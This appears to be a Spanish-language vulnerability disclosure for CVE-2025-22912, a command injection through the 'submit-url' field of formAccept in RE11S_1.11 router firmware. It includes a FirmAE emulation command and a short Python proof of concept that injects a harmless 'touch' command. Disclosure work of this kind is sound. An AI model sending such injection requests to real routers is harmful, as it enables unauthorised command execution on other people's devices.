
CVE-2025-22912
Durante mi pasantía en Qi An Xin Tiangong Lab, descubrí una vulnerabilidad de inyección de comandos en el router RE11S_1.11.
Al analizar el archivo webs en el directorio bin, descubrí que la función formAccept contiene una vulnerabilidad de inyección de comandos.
La inyección de comandos se puede activar mediante el valor de la clave submit-url, lo que conduce a una inyección de comandos del sistema.

Usa el siguiente comando para simular con firmAE.
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
El contenido del archivo poc.py es el siguiente:
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

Se puede observar que se añade un archivo /tmp/xyq después de la ejecución, lo que demuestra que el ataque es exitoso.